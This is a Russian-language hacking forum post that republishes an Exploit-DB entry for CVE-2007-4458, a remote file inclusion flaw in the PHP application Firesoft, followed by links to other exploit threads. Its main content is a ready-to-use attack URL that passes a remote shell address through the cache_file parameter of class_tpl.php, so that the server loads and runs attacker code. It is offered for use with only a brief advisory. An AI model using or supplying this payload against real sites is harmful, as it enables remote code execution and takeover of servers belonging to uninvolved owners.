Exploit Firesoft - 'Class_TPL.php' Remote File Inclusion

Автор темы Exploiter
Дата начала 21 Дек 2022
Просмотров 280 Просмотров

JavaScript отключён. Чтобы полноценно использовать наш сайт, включите JavaScript в своём браузере.

Отключить рекламу | Купить рекламу

Exploiter

Хакер

#1

EDB-ID: 30510

Проверка EDB

Пройдено

Автор: DARKDEWIL

Тип уязвимости: WEBAPPS

Платформа: PHP

CVE: cve-2007-4458

Дата публикации: 2007-08-20

Код:

source: https://www.securityfocus.com/bid/25366/info

Firesoft is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. 

http://www.example.com/path/includes/class/class_tpl.php?cache_file=http://SHELLURL?

Источник: www.exploit-db.com

Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploit Microsoft Windows - 'nt!NtQueryInformationProcess (information class 76, QueryProcessEnergyValues)' Kernel Stack Memory Disclosure

Ответы: 0

Просмотры: 821

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit Microsoft Windows - 'nt!NtQuerySystemInformation (information class 138, QueryMemoryTopologyInformation)' Kernel Pool Memory Disclosure

Ответы: 0

Просмотры: 783

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit Yoga Class Script 1.0 - 'list?city' SQL Injection

Ответы: 0

Просмотры: 755

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit Microsoft Windows - 'nt!NtQueryInformationResourceManager (information class 0)' Kernel Stack Memory Disclosure

Ответы: 0

Просмотры: 681

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit Microsoft Windows - 'nt!NtQueryInformationJobObject (information class 12)' Kernel Stack Memory Disclosure

Ответы: 0

Просмотры: 682

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit Microsoft Windows - 'nt!NtQueryInformationJobObject (information class 28)' Kernel Stack Memory Disclosure

Ответы: 0

Просмотры: 698

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit Microsoft Windows - 'nt!NtQueryInformationTransaction (information class 1)' Kernel Stack Memory Disclosure

Ответы: 0

Просмотры: 685

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit VMware Workstation 14.1.5 / VMware Player 15 - Host VMX Process COM Class Hijack Privilege Escalation

Ответы: 0

Просмотры: 756

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit TomatoCart 1.1.8.2 - 'class' Local File Inclusion

Ответы: 0

Просмотры: 507

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit CakePHP 2.2.8/2.3.7 - AssetDispatcher Class Local File Inclusion

Ответы: 0

Просмотры: 472

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Сверху Снизу

Привет, Друг. Твои права на форуме ограничены! Зарегистрируйся или Войди на форум, чтобы снять ограничение.